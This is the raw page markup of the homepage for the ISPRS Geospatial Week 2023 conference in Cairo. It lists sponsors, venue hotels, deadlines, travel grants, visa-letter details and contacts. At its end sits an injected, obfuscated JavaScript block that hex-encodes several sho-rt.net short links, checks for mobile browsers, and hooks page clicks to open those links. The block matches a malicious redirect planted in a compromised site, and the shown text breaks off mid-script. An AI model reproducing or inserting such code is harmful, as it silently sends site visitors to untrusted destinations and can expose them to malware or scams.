Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Camera ready paper submission: July 15, 2023 </strong></li>\n<li><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></li>\n<li><strong>Early bird registration deadline: July 1, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" button_alignment=\"btn_center\" css=\".vc_custom_1686689514453{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 